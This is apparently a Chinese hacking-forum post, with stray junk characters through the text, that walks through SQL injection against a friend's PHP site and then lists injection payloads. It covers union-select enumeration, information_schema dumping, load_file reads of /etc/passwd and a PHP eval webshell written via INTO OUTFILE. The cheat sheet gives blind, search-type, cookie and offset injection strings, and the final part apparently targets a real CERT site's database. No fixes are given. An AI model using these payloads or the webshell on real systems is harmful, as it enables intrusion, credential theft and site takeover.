我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~# [- z# w) N$ U# N g
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
2 N/ Q: L7 V& H, w我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
$ u$ M0 x% _: s l; Q2 @( D如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
+ n' f! G' N% p) @- L5 l1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
! N) B% G9 |5 c2 Y! N% i% g7 C这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:2 z; M3 k/ a7 T$ `
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
1 A+ A$ E2 a" Z4 z) u. R$ B/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入4 Z1 N7 l) N( F- v7 `. G
% v0 `( i: j+ M2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,1 S$ w! s. t8 E* [+ y) `" N/ d
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
$ B2 k/ Y9 n' l3 v. T1 J4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
8 O1 @, i! |# b* Z% r5 {5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。% K) b& N8 L1 ~
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,3 X- N J3 v( c. r% W* O' g" s
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。1 s0 Y& a* ^. d8 k/ D: S
我就用的是第二个思路,* g+ x0 e- a2 _1 Y. w# V% I
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- : f- ^5 h. m) q4 \
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,& W. p0 g0 L) x! p8 L, M
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--0 G- Q: C; [5 [% L6 v% {; g: e
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
1 q% o, {) s4 g2 H0 {/ ^2 g0 N7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
7 s4 Z3 U9 \6 R0 z* N# \1 r是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
+ l/ Y: ~2 ^0 R% t9 n提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
+ r r% Q$ L8 d5 N然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,% k: O6 l' L8 v5 \5 X1 L+ Z- ?
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限....... S, J* Y6 v# c3 k
下面是一些很普遍注入方式资料:3 [$ k% b* {/ Q3 }
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='# ~" h9 O" t( u( U: @ \' Z' u$ k
拆半法& K8 b: T: A% B0 t: i2 Q
######################################
. G: [. G6 ]5 l) o) E5 K" N( K# Gand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
# H% b" b' F8 [+ Band exists (select * from admin)
; A) `! O1 W9 H" U% Z) a% P _! p2 I$ _and exists(select id from admin); L2 R: ~: M1 Z+ j- [: v% J
and exists(select id from admin where id=1)+ b7 q5 a5 A/ c* S, k
and exists(select id from admin where id>1) 0 N/ }' E& G0 ~; r- P1 q6 O- b# B
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 7 C# ~7 x' k4 F! ^9 X
and exists (select username from admin)
. W: ^+ W7 V j3 i8 `6 j; L6 F" Uand exists (select password from admin)5 q: i( j" h" b/ r. ]& c
and exists (select id from admin where len(username)<10 and id=1)
" q- s6 N" E) b) `and exists (select id from admin where len(username)>5 and id=1)
, q* u5 X3 J; r; X/ s& O$ {and exists (select id from admin where len(username)=6 and id=1) }6 f, |0 C- c6 N
and exists (select id from admin where len(password)<10 and id=1)
/ ^& T+ p+ ~! a8 g! Tand exists (select id from admin where len(password)>5 and id=1)
; P' u s1 a- a9 r/ B# Oand exists (select id from admin where len(password)=7 and id=1)1 V- d0 G: e7 O' K* Y% [
and (select top 1 asc(mid(username,1,1)) from admin)=97) ^$ } `& }9 ?0 `
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
" w0 H% K! R, V0 F$ u猜第二位把username,1,1改成username,2,1就可以了。
+ H* |: [0 f& C$ k |# P猜密码把username改成password就OK了
: I G& d0 \3 z+ @$ r9 _3 O8 `##################################################
. i1 C/ ?7 m) m, @% i O1 L) F搜索型注入0 C5 |8 N7 Q( b2 z7 Q
##################################
* u, o- X* |& u. U%' and 1=1 and '%'='
2 j1 k9 ?* P( z8 n" s%' and exists (select * from admin) and '%'='
. a, ^3 V; r% n' P%' and exists(select id from admin where id=1) and '%'='
q6 c$ e8 f8 q* E& b8 v%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
6 P9 H- Y! t+ D%' and exists (select id from admin where len(password)=7 and id=1) and '%'=': A9 `- z( b7 R
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='" k; V; U& S! [3 h
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
$ \+ \5 D, k9 U. N7 o, C$ U. n对于MSSQL数据库,后面可以吧 and '%'='换成--- T# ?1 K* s+ e# }
还有一点搜索型注入也可以使用union语句。% r9 B0 i; q7 ]; x' L1 S! `9 d6 F
########################################################
* ^1 ?/ i- b& j" G V) V3 P联合查询。- Z& W, l5 F; m9 K# Y
#####################################: |7 Q9 A: V' B4 M; }6 d. q
order by 10% A9 l5 s& f9 K
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
. p x4 |- a& F+ d+ p$ Kand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
' q; O4 l/ Z/ u, o q$ h5 G; q" Dand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
% l4 e% a" y1 U0 X: O6 E很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
( W+ \$ m! g8 u% R$ \###################################; f% c, d+ U! y6 \
cookie注入
: C% {( |, D, D- [###############################% @: j3 z* l% ?1 K& ^4 {6 O$ q
http://www.******.com/shownews.asp?id=127
$ q6 i- a* e3 _http://www.******.com/shownews.asp5 _; d" ~% Y O
alert(="id="+escape("127"));0 y$ H( S T# r6 K: {; Z
alert(="id="+escape("127 and 1=1"));0 x7 e- v/ K5 b
alert(="id="+escape("127 order by 10"));
4 y1 x ~4 G1 B& xalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));3 z6 Q. a. I" f, ?
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
: [9 f8 b, `. ] \) {( Z这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
- v* u. v+ q. c# _/ n' T& t( c- s###################################
/ t( W! O6 Z# Z+ W N偏移注入9 B) c2 N b7 ~
###########################################################; M3 ~; H4 x& @/ k! b
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
4 d) a" a$ c& s/ K( m0 N/ m' ]/ hunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
% Y! n4 d% O4 h# F hunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)- | S5 [. A& O. W
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)1 F/ @, I' E* F6 Q& w ?
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id); k3 z W4 F8 t& {" S$ }2 W: Z
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
3 v0 `" w; U1 F& A+ z# hunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
! `/ I% B5 {; j7 ]4 L, { ca.id=d.id)
7 f7 y) E" \" p# V& @& P8 nand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
! c/ D8 c0 c; V$ J; X' o4 R9 Iand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) , x' p/ w6 Y1 ^+ \8 l
$ O m, T" `; p8 |! d8 D============================================================================================================
( F! w5 W) Z+ I3 u9 P S1.判断版本! w0 F \& @6 m L% ^! T1 Y
and ord(mid(version(),1,1))>51
, u0 i7 E7 N$ \" y返回正常,说明大于4.0版本,支持ounion查询
+ B0 R/ @) ^3 `, s9 t( y' S2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
5 @2 m# C) ]% z% @. Oand 2=4 union select 1,2,3,4,5,6,7,8,9--0 U2 Q2 x4 r" R3 X( {0 G) t/ @2 v' ^
3.查看数据库版本及当前用户,
( a7 E6 t* D7 T2 I/ ?and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
# S5 c4 a) b$ c8 i# o数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,* ?1 |' W! E/ w. g5 f
4.判断有没有写权限1 @* s9 d9 |1 @
and (select count(*) from MySQL.user)>0-- / h) ^5 l; {+ g% T. V" g
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1! z4 r8 _/ H; b
用不了这个命令,就学习土耳其黑客手法,如下
2 Q4 q7 F V' U5 \9 A2 wand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
" W7 ]7 y) ^7 \. l- }% e# H2 j* G6.爆表,爆库$ }2 V' W- P' P+ R. `
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
8 k% i9 j2 D) V: n6 P& h7.爆列名,爆表
2 _, n* g7 U0 i4 oand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--6 s, h7 Z; t6 `
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。2 ^" [4 t! S% Y) U" x
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--( `3 F- r0 a: b5 I9 u3 J
9.爆字段内容/ V7 ^0 F; a0 V$ e. x( i& V: }. z& U
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--9 J" L6 K+ f: Q0 r
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |